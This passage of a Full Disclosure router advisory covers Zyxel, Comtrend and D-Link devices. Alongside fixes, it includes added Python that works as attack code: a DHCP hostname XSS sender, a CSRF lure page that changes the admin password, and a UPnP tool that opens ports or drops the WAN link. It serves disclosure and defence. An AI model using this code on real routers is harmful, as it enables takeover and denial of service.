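    """Broadcast the packet from UDP/68 to UDP/67 on the LAN. Needs privileges for
    port 68; not exercised offline."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
        s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        s.bind((bind_ip, 68))
        s.sendto(packet, ("255.255.255.255", 67))


if __name__ == "__main__":
    pkt = build_dhcp_request(EXAMPLE_MAC, EXAMPLE_PAYLOAD)
    print(len(pkt), "bytes; hostname option =", parse_options(pkt)[OPT_HOSTNAME])
    # send_request(pkt)   # only on a lab LAN you are authorised to test
```

A bare DHCPREQUEST with no preceding DISCOVER/OFFER may be NAKed or ignored depending on the server, so the simplest reliable reproduction is a normal DHCP client configured to send the payload as its hostname (for ISC dhclient, a `send host-name "...";` line in dhclient.conf): the Host Name option is sent identically in DISCOVER and REQUEST, and the lease table records whatever the server accepted. Many DHCP servers validate the hostname against the RFC 952/1035 character set; the fix on the router side is to HTML-encode the stored hostname wherever the lease table renders it.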
============================================================================================
============================================================================================
Manufacturer: Zyxel
Model: P 660HW-B1A
Tested firmwares: 3.10L.02
Comments: Common router that Spanish ISP Telefonica used to give away to their customers
--------------------------------------------------------------------------------------------
----------------------------- Persistent Cross Site Scripting ----------------------------
* Description: Some input fields within the router website are vulnerable to persistent
Cross-site Scripting (XSS): a value stored through them is later rendered without
encoding, so attacker-supplied script runs in the browser of any user who views the
affected pages.
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignment.
OSVDB-121796 (http://osvdb.org/show/osvdb/121796)
* PoC:
Although most of the input fields reject special characters, a few still accept them and
can be used for XSS. E.g., the Hostname field within the Dynamic DNS subdirectory accepts
script code, which is stored with the configuration.
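To test the "most fields filter, a few do not" observation systematically rather than field by field, the following Python, added here as an example and not the advisory's code, stores a marked probe through a field and then classifies how every page that shows the value renders it (absent, escaped, filtered or raw). It generalises the VG-8050 SSID and P 660HW Dynamic DNS hostname cases above. FakeRouter is a constructed stand-in whose behaviour is invented for the demo, not that of either firmware; its page names reuse the VG-8050 menu names only as labels.

```python
import html
import re

PROBE_MARK = "xss7f3a"                  # unique marker, constructed for this example
PROBE = f"<b>{PROBE_MARK}</b>"          # intact only if '<' and '>' are stored and rendered raw


def classify_reflection(page_html, probe=PROBE, mark=PROBE_MARK):
    """How does a page that shows the stored value treat it?"""
    if mark not in page_html:
        return "absent"                  # value not rendered on this page
    if probe in page_html:
        return "raw"                     # tags intact: stored XSS on this page
    if html.escape(probe) in page_html or html.escape(probe, quote=False) in page_html:
        return "escaped"                 # encoded at output, safe here
    return "filtered"                    # marker survived but tags were altered or stripped


def probe_field(set_field, render_pages, probe=PROBE, mark=PROBE_MARK):
    """Store the probe via set_field(value) -> bool, then classify every page that
    render_pages() returns as {page name: html}."""
    if not set_field(probe):
        return {"<input>": "rejected"}   # input-side filter on the field itself
    return {name: classify_reflection(body, probe, mark)
            for name, body in render_pages().items()}


class FakeRouter:
    """Constructed stand-in for a router web UI. Invented behaviour: the hostname field
    filters special characters, the SSID field does not, and only one of the pages that
    display the SSID encodes it."""

    def __init__(self):
        self.cfg = {"ssid": "home", "hostname": "router"}

    def set(self, field, value):
        if field == "hostname" and re.search(r"[<>'\"]", value):
            return False
        self.cfg[field] = value
        return True

    def pages(self):
        ssid = self.cfg["ssid"]
        return {
            "Wireless->Basic": f'<input name="ssid" value="{html.escape(ssid)}">',
            "Wireless->Security": f"<p>Security settings for {ssid}</p>",
            "Wireless->MAC Filter": f"<td>{ssid}</td>",
            "Device Info": f"<td>{html.escape(self.cfg['hostname'])}</td>",
        }


def demo():
    """Probe both fields of the fake router and return the per-page classification."""
    r = FakeRouter()
    return {
        "ssid": probe_field(lambda v: r.set("ssid", v), r.pages),
        "hostname": probe_field(lambda v: r.set("hostname", v), r.pages),
    }
```

Against a real device, set_field would submit the configuration form and render_pages would fetch each page with an authenticated session; the classification logic stays the same. The distinction between "escaped" and "raw" for the same stored value is the point: the page the value is entered on says nothing about how other pages render it, so every page that shows the field has to be checked.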
--------------------------------------------------------------------------------------------
------------------------------- Cross Site Request Forgery -------------------------------
* Description: Multiple Cross Site Request Forgery (CSRF) vulnerabilities within the router
website allow a remote attacker, through a page the victim visits, to make the victim's
logged-in browser carry out actions such as changing the administrator password.
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignment.
OSVDB-121797 (http://osvdb.org/show/osvdb/121797)
* PoC:
Every configuration form in the router website can be submitted cross-site: requests carry
no anti-CSRF token and state changes are accepted over a plain GET, so any link or hidden
image loaded by the victim's browser while it holds a router session is enough.
E.g., to change the administrator password, an attacker can have the victim open the
following URL (192.168.1.1 is the device's default LAN address):
http://192.168.1.1/password.cgi?sysPassword=newpassword
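As an added example (not code from the advisory), the following Python shows both sides of the issue: lure_page produces the attacker page that makes a logged-in victim's browser fetch the password.cgi URL above through a hidden image, and request_is_forged is the check the router lacks, namely rejecting state changes over GET, requiring a same-origin Origin/Referer header and a per-session anti-CSRF token. The attacker hostname and the request dicts are constructed for the example; the router's real request handling is not modelled.

```python
import html
import secrets
from urllib.parse import urlsplit

ROUTER_ORIGIN = "http://192.168.1.1"            # the device's default LAN address
# The state-changing URL from the advisory; the password value is a placeholder.
TARGET_URL = "http://192.168.1.1/password.cgi?sysPassword=newpassword"


def lure_page(target_url=TARGET_URL):
    """Attacker-hosted page: a hidden <img> makes the victim's browser issue the GET
    with the victim's router session attached. Works only because the change is a GET;
    a POST-only endpoint would need an auto-submitting form instead."""
    return ("<html><body><p>Loading...</p>"
            f'<img src="{html.escape(target_url)}" width="1" height="1" alt="">'
            "</body></html>")


def issue_token():
    """Per-session anti-CSRF token the router would embed in each of its forms."""
    return secrets.token_urlsafe(32)


def request_is_forged(method, headers, params, session_token, own_origin=ROUTER_ORIGIN):
    """The checks the router lacks. Returns None for a legitimate request, otherwise
    the reason it would be rejected."""
    if method.upper() != "POST":
        return "state change requested over GET"
    origin = headers.get("Origin") or headers.get("Referer")
    if origin is None:
        return "no Origin/Referer header"
    if urlsplit(origin)[:2] != urlsplit(own_origin)[:2]:   # scheme and host must match
        return f"cross-site request from {origin!r}"
    supplied = params.get("csrf_token", "")
    if not session_token or not secrets.compare_digest(supplied.encode(),
                                                       session_token.encode()):
        return "missing or wrong anti-CSRF token"
    return None


def demo():
    """Constructed requests: the forged one is what lure_page causes; the other is a
    legitimate submission from the router's own form carrying the session token."""
    token = issue_token()
    forged = request_is_forged("GET", {"Referer": "http://attacker.example/lure.html"},
                               {"sysPassword": "newpassword"}, token)
    legit = request_is_forged("POST", {"Origin": ROUTER_ORIGIN},
                              {"sysPassword": "newpassword", "csrf_token": token}, token)
    return forged, legit
```

The token comparison uses secrets.compare_digest so that a wrong token cannot be distinguished from a right one by timing. Note that the Origin/Referer check alone is not enough on its own (some clients strip Referer, and a device that must also work without it would have to fall back to the token), which is why the token is the primary control and the header check a second layer.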
============================================================================================
============================================================================================
Manufacturer: Comtrend
Model: 536+
Tested firmwares: A101-220TLF-C35
Comments: Common router that Spanish ISP Telefonica used to give away to their customers
--------------------------------------------------------------------------------------------
-------------------------------- Universal Plug and Play ---------------------------------
* Description: An unauthenticated attacker is able to modify firewall rules and carry out a
persistent denial of service through the Universal Plug and Play (UPnP) protocol supported
by the device.
* Report status: Reported to MITRE on 2015-05-21. Waiting for assignment.
OSVDB-122383 (http://osvdb.org/show/osvdb/122383)
* PoC:
The device supports the Universal Plug and Play (UPnP) protocol. UPnP IGD control requests
carry no authentication at all, so any host that can reach the device's UPnP control
endpoint (normally any host on the LAN) can invoke its actions.
The device exposes multiple UPnP actions, such as changing the firewall rules
(AddPortMapping) or tearing down any WAN connection (ForceTermination).
These actions allow an attacker to carry out a persistent denial of service (the router
needs to be factory reset to work properly again) or to open critical ports, even towards
remote hosts that are not on the LAN (the internal client of a mapping is not restricted
to LAN addresses).
============================================================================================
============================================================================================
Manufacturer: D-Link
Model: DIR-600
Tested firmwares: PV6K3A8024009
Comments:
--------------------------------------------------------------------------------------------
-------------------------------- Universal Plug and Play ---------------------------------
* Description: An unauthenticated attacker is able to modify firewall rules and carry out a
persistent denial of service through the Universal Plug and Play (UPnP) protocol supported
by the device.
* Report status: Reported to MITRE on 2015-05-21. Waiting for assignment.
OSVDB-122384 (http://osvdb.org/show/osvdb/122384)
* PoC:
The Universal Plug and Play (UPnP) protocol is enabled by default on the device. UPnP IGD
control requests carry no authentication at all, so any host that can reach the device's
UPnP control endpoint (normally any host on the LAN) can invoke its actions.
The device exposes multiple UPnP actions, such as changing the firewall rules
(AddPortMapping) or tearing down any WAN connection (ForceTermination).
These actions allow an attacker to carry out a persistent denial of service (the router
needs to be factory reset to work properly again) or to open critical ports, even towards
remote hosts that are not on the LAN (the internal client of a mapping is not restricted
to LAN addresses).
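The following Python, added as an example for both the Comtrend 536+ and the D-Link DIR-600 UPnP entries above and not part of the advisory, builds the messages involved: an SSDP M-SEARCH to locate the Internet Gateway Device, a parser for its reply, and the SOAP envelopes for the two actions the advisory names (AddPortMapping and ForceTermination) on the WANIPConnection:1 service. The control URL must be read from the device description that the LOCATION header points to (not done here); the sample SSDP reply, addresses and ports are constructed for the example, and discover and send_action are the only functions that touch the network.

```python
import socket
import urllib.request
from xml.sax.saxutils import escape

SSDP_ADDR, SSDP_PORT = "239.255.255.250", 1900
# DSL routers on PPPoE may expose WANPPPConnection:1 instead; the actions are the same.
WANIP = "urn:schemas-upnp-org:service:WANIPConnection:1"


def msearch_message(st=WANIP, mx=2):
    """SSDP M-SEARCH; an IGD answers with a LOCATION header giving its description URL."""
    return ("M-SEARCH * HTTP/1.1\r\n"
            f"HOST: {SSDP_ADDR}:{SSDP_PORT}\r\n"
            'MAN: "ssdp:discover"\r\n'
            f"MX: {mx}\r\n"
            f"ST: {st}\r\n\r\n").encode()


def parse_ssdp_response(data):
    """Headers of an SSDP reply as a dict with lower-case keys (location, st, usn, ...)."""
    headers = {}
    for line in data.decode(errors="replace").split("\r\n")[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return headers


def discover(timeout=2.0):
    """Multicast the M-SEARCH on the LAN and return the parsed replies (network; not run offline)."""
    replies = []
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(msearch_message(), (SSDP_ADDR, SSDP_PORT))
        try:
            while True:
                data, _ = s.recvfrom(4096)
                replies.append(parse_ssdp_response(data))
        except socket.timeout:
            pass
    return replies


def soap_envelope(action, args, service=WANIP):
    """Headers and body for one UPnP action. Nothing in the request identifies or
    authenticates the caller, which is the weakness the advisory describes."""
    body = "".join(f"<{k}>{escape(str(v))}</{k}>" for k, v in args.items())
    xml = ('<?xml version="1.0"?>'
           '<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" '
           's:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">'
           f'<s:Body><u:{action} xmlns:u="{service}">{body}</u:{action}></s:Body></s:Envelope>')
    headers = {"Content-Type": 'text/xml; charset="utf-8"',
               "SOAPAction": f'"{service}#{action}"'}
    return headers, xml


def add_port_mapping(ext_port, internal_client, int_port=None, proto="TCP", desc="test"):
    """AddPortMapping with the argument order of WANIPConnection:1. A hardened stack refuses
    a NewInternalClient outside the LAN; the advisory reports these devices do not."""
    return soap_envelope("AddPortMapping", {
        "NewRemoteHost": "",
        "NewExternalPort": ext_port,
        "NewProtocol": proto,
        "NewInternalPort": int_port or ext_port,
        "NewInternalClient": internal_client,
        "NewEnabled": 1,
        "NewPortMappingDescription": desc,
        "NewLeaseDuration": 0,
    })


def force_termination():
    """ForceTermination takes no arguments: it simply drops the WAN connection."""
    return soap_envelope("ForceTermination", {})


def send_action(control_url, headers, xml, timeout=5):
    """POST an envelope to the service's controlURL taken from the device description."""
    req = urllib.request.Request(control_url, data=xml.encode(), headers=headers, method="POST")
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.status, resp.read().decode(errors="replace")
```

Usage: discover() yields the LOCATION URL; fetch that XML, find the WANIPConnection (or WANPPPConnection) service entry and its controlURL, then pass the headers and body from add_port_mapping or force_termination to send_action. On the defensive side, disable UPnP when nothing on the LAN needs it; an implementation that does bind the service should answer only on the LAN interface and reject mappings whose internal client is not a LAN address.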
============================================================================================
We would also like to thank Alejandro Ramos (Project Tutor) and Maite
Villalba (Director of Master).
Greetings,
Jose Antonio Rodriguez Garcia
Alvaro Folgado Rueda
Ivan Sanz de Castro.
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/